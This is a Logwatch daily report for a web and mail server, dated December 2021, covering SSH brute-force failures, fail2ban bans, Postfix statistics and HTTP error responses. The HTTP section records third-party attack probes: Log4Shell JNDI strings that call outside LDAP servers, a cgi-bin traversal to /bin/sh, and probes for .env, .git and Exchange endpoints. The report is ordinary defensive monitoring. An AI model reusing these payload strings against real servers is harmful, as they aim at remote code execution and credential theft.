################### Logwatch 7.4.0 (03/01/11) #################### Processing Initiated: Fri Dec 24 04:42:04 2021 Date Range Processed: yesterday ( 2021-Dec-23 ) Period is day. Detail Level of Output: 0 Type of Output/Format: mail / text Logfiles for Host: h2361197.stratoserver.net ################################################################## --------------------- fail2ban-messages Begin ------------------------ Banned services with Fail2Ban: Bans:Unbans ssh: [ 16:16 ] ---------------------- fail2ban-messages End ------------------------- --------------------- httpd Begin ------------------------ Connection attempts using mod_proxy: 49.113.101.166 -> zapf.wiki:443: 1 Time(s) A total of 11 sites probed the server 139.59.131.46 148.72.158.94 161.35.236.158 167.71.102.181 174.138.0.214 182.127.166.65 185.142.236.40 2.58.149.155 212.192.216.78 54.166.112.108 89.248.165.45 Requests with error response codes 400 Bad Request null: 13 Time(s) /: 5 Time(s) mstshash=Domain: 4 Time(s) /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh: 2 Time(s) /robots.txt: 1 Time(s) zapf.wiki:443: 1 Time(s) 403 Forbidden /FrcS3CFURGOhH8IZnOVeEw?both=: 1 Time(s) 499 (undefined) /: 6 Time(s) /${jndi:ldap://142.93.172.227:1389/Exploit}: 1 Time(s) /?s=${jndi:ldap://142.93.172.227:1389/Exploit}: 1 Time(s) 500 Internal Server Error /: 44 Time(s) /.env: 4 Time(s) /.git/HEAD: 2 Time(s) /?x=${jndi:ldap://195.54.160.149:12344/Bas ... I6NDQzKXxiYXNo}: 2 Time(s) /ecp/Current/exporttool/microsoft.exchange ... ool.application: 2 Time(s) /robots.txt: 2 Time(s) //login_sid.lua: 1 Time(s) /?XDEBUG_SESSION_START=phpstorm: 1 Time(s) /Autodiscover/Autodiscover.xml: 1 Time(s) /actuator/health: 1 Time(s) /index.php?s=/Index/\x5Cthink\x5Capp/invok ... HelloThinkPHP21: 1 Time(s) /mifs/.;/services/LogService: 1 Time(s) /owa/auth/logon.aspx: 1 Time(s) /owa/auth/x.js: 1 Time(s) /solr/: 1 Time(s) ---------------------- httpd End ------------------------- --------------------- pam_unix Begin ------------------------ sshd: Authentication Failures: root (125.87.86.147): 36 Time(s) root (146.56.205.217): 35 Time(s) root (213.6.203.226): 33 Time(s) root (119.29.0.209): 32 Time(s) root (49.232.221.113): 32 Time(s) root (180.76.246.21): 26 Time(s) root (202.111.30.6): 25 Time(s) unknown (180.76.246.21): 21 Time(s) unknown (49.232.221.113): 18 Time(s) unknown (213.6.203.226): 17 Time(s) root (115.248.153.89): 16 Time(s) unknown (146.56.205.217): 15 Time(s) root (121.5.107.215): 14 Time(s) unknown (125.87.86.147): 14 Time(s) unknown (202.111.30.6): 12 Time(s) unknown (119.29.0.209): 11 Time(s) root (106.75.222.175): 9 Time(s) root (124.79.246.228): 6 Time(s) unknown (115.248.153.89): 6 Time(s) root (125-238-192-103-fibre.sparkbb.co.nz): 4 Time(s) unknown (106.75.222.175): 4 Time(s) unknown (121.5.107.215): 4 Time(s) root (221.213.129.46): 3 Time(s) root (60.30.98.194): 2 Time(s) unknown (117.89.142.214): 2 Time(s) unknown (139.64.23.74): 2 Time(s) unknown (195.133.18.104): 2 Time(s) unknown (49.158.25.166): 2 Time(s) unknown (60.30.98.194): 2 Time(s) unknown (80.119.132.77.rev.sfr.net): 2 Time(s) postgres (106.75.222.175): 1 Time(s) postgres (202.111.30.6): 1 Time(s) root (103.254.198.67): 1 Time(s) root (110.77.239.51): 1 Time(s) root (148.102.25.170): 1 Time(s) root (201.137.58.193): 1 Time(s) root (45.88.137.100): 1 Time(s) unknown (125-238-192-103-fibre.sparkbb.co.nz): 1 Time(s) unknown (146.185.79.101): 1 Time(s) unknown (156.234.168.70): 1 Time(s) unknown (201.137.58.193): 1 Time(s) unknown (62.233.50.53): 1 Time(s) Invalid Users: Unknown Account: 139 Time(s) ---------------------- pam_unix End ------------------------- --------------------- Postfix Begin ------------------------ 3 Miscellaneous warnings 10.191K Bytes accepted 10,436 10.191K Bytes sent via SMTP 10,436 ======== ================================================== 1 Accepted 100.00% -------- -------------------------------------------------- 1 Total 100.00% ======== ================================================== 3 4xx Reject relay denied 100.00% -------- -------------------------------------------------- 3 Total 4xx Rejects 100.00% ======== ================================================== 231 Connections 131 Connections lost (inbound) 231 Disconnections 1 Removed from queue 1 Sent via SMTP 44 Timeouts (inbound) 1 Illegal address syntax in SMTP command 2 SMTP dialog errors 1 Hostname verification errors (FCRDNS) ---------------------- Postfix End ------------------------- --------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------ Large Mailbox threshold: 40MB (41943040 bytes) Warning: Large mailbox: mailman.gz (1747199807) Warning: Large mailbox: mailman (235703599967) ---------------------- sendmail-largeboxes (large mail spool files) End ------------------------- --------------------- SSHD Begin ------------------------ Disconnecting after too many authentication failures for user: root : 1 Time(s) Failed logins from: 45.88.137.100: 1 time 49.232.221.113: 32 times 60.30.98.194 (no-data): 2 times 103.254.198.67: 1 time 106.75.222.175: 10 times 110.77.239.51: 1 time 115.248.153.89: 16 times 119.29.0.209: 32 times 121.5.107.215: 14 times 124.79.246.228 (228.246.79.124.broad.xw.sh.dynamic.163data.com.cn): 6 times 125.87.86.147: 36 times 125.238.192.103 (125-238-192-103-fibre.sparkbb.co.nz): 4 times 146.56.205.217: 35 times 148.102.25.170: 1 time 180.76.246.21: 26 times 201.137.58.193 (dsl-201-137-58-193-dyn.prod-infinitum.com.mx): 1 time 202.111.30.6: 26 times 213.6.203.226: 33 times 221.213.129.46: 3 times Illegal users from: 2001:470:1:c84::16: 1 time undef: 108 times 49.158.25.166 (49-158-25-166.dynamic.elinx.com.tw): 2 times 49.232.221.113: 18 times 60.30.98.194 (no-data): 2 times 62.233.50.53: 1 time 64.62.197.32: 1 time 77.132.119.80 (80.119.132.77.rev.sfr.net): 2 times 106.75.222.175: 4 times 115.248.153.89: 6 times 117.89.142.214: 2 times 119.29.0.209: 11 times 121.5.107.215: 4 times 125.87.86.147: 14 times 125.238.192.103 (125-238-192-103-fibre.sparkbb.co.nz): 1 time 139.64.23.74: 2 times 146.56.205.217: 15 times 146.185.79.101: 1 time 156.234.168.70: 1 time 178.73.215.171 (178-73-215-171-static.glesys.net): 1 time 180.76.246.21: 21 times 195.133.18.104: 2 times 201.137.58.193 (dsl-201-137-58-193-dyn.prod-infinitum.com.mx): 1 time 202.111.30.6: 12 times 213.6.203.226: 17 times **Unmatched Entries** Protocol major versions differ for 134.122.134.150: SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3 vs. SSH-1.5-Server : 1 time(s) ---------------------- SSHD End ------------------------- --------------------- Disk Space Begin ------------------------ Filesystem Size Used Avail Use% Mounted on /dev/ploop33257p1 394G 242G 132G 65% / none 4.0G 0 4.0G 0% /dev ---------------------- Disk Space End ------------------------- ###################### Logwatch End #########################